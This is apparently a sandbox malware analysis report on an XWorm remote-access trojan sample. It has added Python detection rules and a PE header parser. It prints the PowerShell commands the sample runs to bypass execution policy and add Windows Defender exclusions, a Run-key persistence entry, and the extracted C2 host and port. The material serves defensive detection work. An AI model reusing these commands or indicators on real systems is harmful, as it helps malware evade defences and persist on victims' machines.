
Windows Analysis Report
X.exe

Overview

General Information

Sample name: X.exe
Analysis ID: 1528947
MD5: edf2d391a87307c0d10482da0aa93e6f
SHA1: 017acb50488e7a3e17c9e90eed8dec6c100a9792
SHA256: c492044065d21e049097e0cde12f57be6eca492a097d790a9b192a62d70fd07d
Tags: exe, github-com-fruktoozik, user-JAMESWT_MHT

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Binary or sample is protected by dotNetProtector
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Creates multiple autostart registry keys
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious execution chain found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Use Short Name Path in Command Line
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • X.exe (PID: 6696 cmdline: "C:\Users\user\Desktop\X.exe" MD5: EDF2D391A87307C0D10482DA0AA93E6F)
    • powershell.exe (PID: 4876 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Windows Defender.exe (PID: 2548 cmdline: "C:\Users\user~1\AppData\Local\Temp\Windows Defender.exe" MD5: E9FF85404CBD9C9DF15E13D0E4B960B1)
      • powershell.exe (PID: 2908 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Defender.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4472 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3132 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Windows Defender.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2056 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Google Chrome.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Google Chrome.exe (PID: 6568 cmdline: "C:\Users\user~1\AppData\Local\Temp\Google Chrome.exe" MD5: D30B86E01EF85AA5FCF4292CB295F00F)
      • powershell.exe (PID: 6684 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Google Chrome.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6604 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Google Chrome.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3636 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\Nursultan by fruktoozik.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 3612 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
  • Windows Defender.exe (PID: 6932 cmdline: "C:\Users\user\AppData\Local\Temp\Windows Defender.exe" MD5: E9FF85404CBD9C9DF15E13D0E4B960B1)
  • Windows Defender.exe (PID: 1180 cmdline: "C:\Users\user\AppData\Local\Temp\Windows Defender.exe" MD5: E9FF85404CBD9C9DF15E13D0E4B960B1)
  • Google Chrome.exe (PID: 1888 cmdline: "C:\Users\user\AppData\Local\Temp\Google Chrome.exe" MD5: D30B86E01EF85AA5FCF4292CB295F00F)
  • Google Chrome.exe (PID: 1168 cmdline: "C:\Users\user\AppData\Local\Temp\Google Chrome.exe" MD5: D30B86E01EF85AA5FCF4292CB295F00F)
  • cleanup

Malware Configuration

Threat name: Xworm
{"C2 url": ["22.ip.gl.ply.gg"], "Port": "54699", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Yara Overview

Dropped Files

Source | Rule | Description | Author
C:\Users\user\AppData\Local\Temp\Google Chrome.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Local\Temp\Google Chrome.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
C:\Users\user\AppData\Local\Temp\Google Chrome.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Strings:
  • 0xc1f0:$s6: VirtualBox
  • 0xc14e:$s8: Win32_ComputerSystem
  • 0xd62c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xd6c9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xd7de:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xcf0e:$cnc4: POST / HTTP/1.1
C:\Users\user\AppData\Local\Temp\Windows Defender.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Local\Temp\Windows Defender.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
(1 more entry not shown on this page)

Memory Dumps

Source | Rule | Description | Author
00000005.00000000.1475029676.0000000000172000.00000002.00000001.01000000.00000009.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000005.00000000.1475029676.0000000000172000.00000002.00000001.01000000.00000009.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Strings:
  • 0xf4c5:$s6: VirtualBox
  • 0xf423:$s8: Win32_ComputerSystem
  • 0x111b0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x1124d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x11362:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x1094e:$cnc4: POST / HTTP/1.1
00000000.00000002.1750706228.00000000140F8000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.1750706228.00000000140F8000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Strings:
  • 0xdcb0:$s6: VirtualBox
  • 0xdc0e:$s8: Win32_ComputerSystem
  • 0xf0ec:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xf189:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xf29e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xe9ce:$cnc4: POST / HTTP/1.1
0000000D.00000000.1724078447.0000000000612000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
(4 more entries not shown on this page)

Unpacked PEs

Source | Rule | Description | Author
5.0.Windows Defender.exe.170000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
5.0.Windows Defender.exe.170000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
5.0.Windows Defender.exe.170000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Strings:
  • 0xf6c5:$s6: VirtualBox
  • 0xf623:$s8: Win32_ComputerSystem
  • 0x113b0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x1144d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x11562:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x10b4e:$cnc4: POST / HTTP/1.1
13.0.Google Chrome.exe.610000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
13.0.Google Chrome.exe.610000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
(6 more entries not shown on this page)

                        System Summary

Source: Registry Key set. Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing. Data: Details: C:\Users\user\AppData\Local\Temp\Windows Defender.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\X.exe, ProcessId: 6696, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Defender
Source: Registry Key set. Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split). Data: the same registry event as above (Details: C:\Users\user\AppData\Local\Temp\Windows Defender.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\X.exe, ProcessId: 6696, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Defender)
Source: Process started. One process-start event (ProcessId 4876) matched six rules; their authors, in the order the report lists them: Florian Roth (Nextron Systems); Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; frack113; Florian Roth (Nextron Systems); Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements). Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\X.exe", ParentImage: C:\Users\user\Desktop\X.exe, ParentProcessId: 6696, ParentProcessName: X.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender.exe', ProcessId: 4876, ProcessName: powershell.exe
Source: Process started. Author: frack113, Nasreddine Bencherchali. Data: Command: "C:\Users\user~1\AppData\Local\Temp\Windows Defender.exe", CommandLine: "C:\Users\user~1\AppData\Local\Temp\Windows Defender.exe", CommandLine|base64offset|contains: (empty), Image: C:\Users\user\AppData\Local\Temp\Windows Defender.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\Windows Defender.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\Windows Defender.exe, ParentCommandLine: "C:\Users\user\Desktop\X.exe", ParentImage: C:\Users\user\Desktop\X.exe, ParentProcessId: 6696, ParentProcessName: X.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\Windows Defender.exe", ProcessId: 2548, ProcessName: Windows Defender.exe
                        No Suricata rule has matched
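The Sigma matches above and the process tree before them all hinge on a handful of command-line and registry features: Add-MpPreference with an -Exclusion* parameter, -ExecutionPolicy Bypass, a Run value pointing into %LOCALAPPDATA%\Temp, an 8.3 short name (user~1) in a command line, a .bat launched from Temp, and the ip-api.com hosting lookup. The Python below is an added example written for this page, not Joe Sandbox, Sigma or the malware author's code: it runs simplified stand-ins for those rules over constructed Sysmon-style events modelled on the tree above. The rule names are borrowed from the report's Sigma titles, but the predicates are my approximations, not the published rule logic. The base64offset helper reproduces the three-offset trick behind the "Powershell Base64 Encoded MpPreference Cmdlet" rule, which catches the cmdlet inside an -EncodedCommand blob where a plaintext regex cannot. The -EncodedCommand event, the explorer-launched Get-MpPreference control, and every field value not copied from the tree are assumptions.

```python
import base64
import re

# --- Sigma-style base64offset matching ---------------------------------------
# A byte string embedded in a base64 blob encodes to one of three character
# sequences depending on its byte offset mod 3.  Emit all three, dropping the
# leading and trailing characters whose bits also depend on neighbouring bytes;
# the survivors are a substring of the blob wherever the needle occurs.
_START = (0, 2, 3)
_END = (None, -3, -2)


def base64offset_variants(value: bytes) -> list:
    variants = []
    for shift in range(3):
        enc = base64.b64encode(b" " * shift + value).decode()
        variants.append(enc[_START[shift]:_END[(shift + len(value)) % 3]])
    return variants


def contains_b64(haystack: str, needle: str) -> bool:
    # powershell -EncodedCommand takes UTF-16LE, so encode the needle that way
    return any(v in haystack for v in base64offset_variants(needle.encode("utf-16le")))


# --- simplified stand-ins for the Sigma rules named in the report -------------
SUSPICIOUS_DIRS = re.compile(r"\\AppData\\Local\\Temp\\|\\Users\\Public\\|\\ProgramData\\", re.I)


def _cmd(ev):
    return ev.get("CommandLine", "")


RULES = [
    ("Powershell Defender Exclusion",
     lambda ev: ev["EventID"] == 1 and "powershell" in ev["Image"].lower() and (
         re.search(r"Add-MpPreference.*-Exclusion(Path|Process|Extension)", _cmd(ev), re.I)
         or contains_b64(_cmd(ev), "Add-MpPreference"))),
    ("Change PowerShell Policies to an Insecure Level",
     lambda ev: ev["EventID"] == 1
     and re.search(r"-ExecutionPolicy\s+(Bypass|Unrestricted)", _cmd(ev), re.I)),
    ("New RUN Key Pointing to Suspicious Folder",
     lambda ev: ev["EventID"] == 13 and "\\CurrentVersion\\Run\\" in ev["TargetObject"]
     and SUSPICIOUS_DIRS.search(ev["Details"])),
    ("Use Short Name Path in Command Line",
     lambda ev: ev["EventID"] == 1 and re.search(r"~\d\\", _cmd(ev))),
    ("Suspicious Script Execution From Temp Folder",
     lambda ev: ev["EventID"] == 1
     and ev["Image"].lower().endswith(("cmd.exe", "wscript.exe", "cscript.exe"))
     and re.search(r'\\Temp\\[^"]+\.(bat|cmd|vbs|js|ps1)\b', _cmd(ev), re.I)),
    ("Hosting/datacenter check via ip-api.com",
     lambda ev: ev["EventID"] == 22 and ev["QueryName"].lower() == "ip-api.com"),
]


def evaluate(events: list) -> dict:
    """Map each event index to the rule names it fires; events with no hits are omitted."""
    hits = {}
    for idx, ev in enumerate(events):
        names = [name for name, pred in RULES if pred(ev)]
        if names:
            hits[idx] = names
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
TEMP = r"C:\Users\user\AppData\Local\Temp"


def _encoded(script: str) -> str:
    return base64.b64encode(script.encode("utf-16le")).decode()


# Constructed Sysmon-style events (EventID 1 = process create, 13 = registry
# value set, 22 = DNS query) modelled on the process tree and Sigma matches
# above; the records themselves are made up for this example.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Users\user\Desktop\X.exe",
     "CommandLine": f'"{PS}" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath '
                    f"'{TEMP}\\Windows Defender.exe'"},
    {"EventID": 1, "Image": PS, "ParentImage": f"{TEMP}\\Google Chrome.exe",     # assumed encoded variant
     "CommandLine": f'"{PS}" -EncodedCommand '
                    + _encoded(f"$p='{TEMP}'; Add-MpPreference -ExclusionPath $p")},
    {"EventID": 13, "Image": r"C:\Users\user\Desktop\X.exe",
     "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Defender",
     "Details": f"{TEMP}\\Windows Defender.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Users\user\Desktop\X.exe",
     "CommandLine": r'C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\Nursultan by fruktoozik.bat" "'},
    {"EventID": 22, "Image": f"{TEMP}\\Google Chrome.exe", "QueryName": "ip-api.com"},
    # benign control: reading the preference is not adding an exclusion
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f'"{PS}" -NoProfile Get-MpPreference'},
]

if __name__ == "__main__":
    for idx, names in evaluate(SAMPLE_EVENTS).items():
        print(idx, names)
```

evaluate(SAMPLE_EVENTS) returns a dict keyed by event index; the control event fires nothing. Run against real Sysmon or EDR telemetry, the Add-MpPreference -Exclusion* predicate deserves a high-severity alert on its own: legitimate installers rarely add Defender exclusions from a PowerShell one-liner, and never with a bypassed execution policy and a target under the user's Temp directory.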

                        AV Detection

Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe; Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe; Avira: detection malicious, Label: TR/Spy.Gen
Source: 0000000C.00000002.1710922848.0000000003161000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: Xworm {"C2 url": ["22.ip.gl.ply.gg"], "Port": "54699", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe; ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe; ReversingLabs: Detection: 81%
Source: X.exe; ReversingLabs: Detection: 63%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe; Joe Sandbox ML: detected
Source: X.exe; Joe Sandbox ML: detected
Source: 13.0.Google Chrome.exe.610000.0.unpack; String decryptor: 22.ip.gl.ply.gg
Source: 13.0.Google Chrome.exe.610000.0.unpack; String decryptor: 54699
Source: 13.0.Google Chrome.exe.610000.0.unpack; String decryptor: 1337
Source: 13.0.Google Chrome.exe.610000.0.unpack; String decryptor: <Xwormmm>
Source: 13.0.Google Chrome.exe.610000.0.unpack; String decryptor: Video
Source: 13.0.Google Chrome.exe.610000.0.unpack; String decryptor: USB.exe
Source: 13.0.Google Chrome.exe.610000.0.unpack; String decryptor: %LocalAppData%
Source: 13.0.Google Chrome.exe.610000.0.unpack; String decryptor: Google Chrome.exe
Source: X.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
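The static PE line just above and the "PE file does not import any functions" signature in the list both come from the PE optional header: DllCharacteristics carries the flag bits, and the import and CLR data directories say whether an import table and a managed (.NET) header exist. The Python below is an added example for this page, not Joe Sandbox's parser: parse_pe_header reads those fields from any PE32 or PE32+ image, and because the analysed sample is not reproduced here, build_sample_pe32plus constructs a headers-only PE32+ image carrying the same four flags to run it against. The ImageBase, directory RVAs and sizes in that builder are made-up values.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",
    0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT",
    0x0200: "NO_ISOLATION",
    0x0400: "NO_SEH",
    0x0800: "NO_BIND",
    0x1000: "APPCONTAINER",
    0x2000: "WDM_DRIVER",
    0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}
IMPORT_DIR = 1     # IMAGE_DIRECTORY_ENTRY_IMPORT
CLR_DIR = 14       # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, the .NET CLR header


def parse_pe_header(data: bytes) -> dict:
    """Read DllCharacteristics and the import/CLR data directories from a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, _nsect, _ts, _symtab, _nsyms, _opt_size, _chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20                          # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x20B:                       # PE32+
        bits, dirs_off = 64, 112
    elif magic == 0x10B:                     # PE32
        bits, dirs_off = 32, 96
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]    # same offset in PE32 and PE32+
    n_dirs = struct.unpack_from("<I", data, opt + dirs_off - 4)[0]   # NumberOfRvaAndSizes

    def directory(index):
        if index >= n_dirs:
            return 0, 0
        return struct.unpack_from("<II", data, opt + dirs_off + 8 * index)

    imp_rva, imp_size = directory(IMPORT_DIR)
    clr_rva, clr_size = directory(CLR_DIR)
    return {
        "bits": bits,
        "machine": machine,
        "dll_characteristics": [n for bit, n in sorted(DLL_CHARACTERISTICS.items()) if dll_chars & bit],
        "has_import_table": bool(imp_rva and imp_size),
        "is_dotnet": bool(clr_rva and clr_size),
    }


def build_sample_pe32plus(dll_chars=0x8540, with_imports=False, dotnet=True) -> bytes:
    """Constructed, headers-only PE32+ image for the demonstration (not the analysed sample)."""
    e_lfanew = 0x40
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # x64, no sections, 240-byte optional header, EXECUTABLE_IMAGE | LARGE_ADDRESS_AWARE
    coff = struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, 240, 0x0022)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)
    struct.pack_into("<Q", opt, 24, 0x140000000)      # ImageBase (made-up value)
    struct.pack_into("<H", opt, 68, 2)                # Subsystem: WINDOWS_GUI
    struct.pack_into("<H", opt, 70, dll_chars)
    struct.pack_into("<I", opt, 108, 16)              # NumberOfRvaAndSizes
    if with_imports:
        struct.pack_into("<II", opt, 112 + 8 * IMPORT_DIR, 0x2000, 0x50)   # made-up RVA/size
    if dotnet:
        struct.pack_into("<II", opt, 112 + 8 * CLR_DIR, 0x2008, 0x48)      # made-up RVA/size
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    print(parse_pe_header(build_sample_pe32plus()))
```

Two points worth keeping in mind when reading the report's signatures against this output. A pure-IL 64-bit assembly legitimately has an empty import directory, because the Windows loader recognises the CLR header in data directory 14 directly and needs no mscoree import thunk, so "does not import any functions" is weak evidence on its own; the presence of the CLR header is the reliable managed-code check. And the absence of HIGH_ENTROPY_VA and GUARD_CF alongside DYNAMIC_BASE and NX_COMPAT is simply what the default .NET toolchain emits, so those flags describe how the binary was built, not whether it is malicious.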

                        Software Vulnerabilities

Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe; Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                        Networking

Source: Malware configuration extractor; URLs: 22.ip.gl.ply.gg
Source: Yara match; File source: 5.0.Windows Defender.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 13.0.Google Chrome.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.X.exe.140f9ac0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe, type: DROPPED
Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe, type: DROPPED
Source: global traffic; HTTP traffic detected (two identical requests): GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: Joe Sandbox View; IP Address: 208.95.112.1
Source: Joe Sandbox View; ASN Name: TUT-ASUS
Source: unknown; DNS query (two occurrences): name: ip-api.com
Source: unknown; UDP traffic detected without corresponding DNS query (three occurrences): 1.1.1.1
Source: global traffic; HTTP traffic detected (two identical requests): GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: global traffic; DNS traffic detected: DNS query: time.windows.com
Source: global traffic; DNS traffic detected: DNS query: ip-api.com
Source: powershell.exe, 0000001A.00000002.2938908056.000001D0F6095000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.m
Source: powershell.exe, 00000011.00000002.2232854236.00000190DD0EB000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000011.00000002.2228425709.00000190DD0C3000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.microsoqx8
Source: X.exe, 00000000.00000002.1750706228.00000000140F8000.00000004.00000800.00020000.00000000.sdmp, Windows Defender.exe, 00000005.00000000.1475029676.0000000000172000.00000002.00000001.01000000.00000009.sdmp, Google Chrome.exe, 0000000D.00000000.1724078447.0000000000612000.00000002.00000001.01000000.0000000A.sdmp, Windows Defender.exe.0.dr, Google Chrome.exe.0.dr; String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000002.00000002.1453442601.00000253ADBF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1639554132.000002D22106F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1756386840.000001D510070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2141274912.00000190D484F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2276113890.0000021E474EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2855993611.000001D090067000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001C.00000002.2493859765.0000026F597C2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
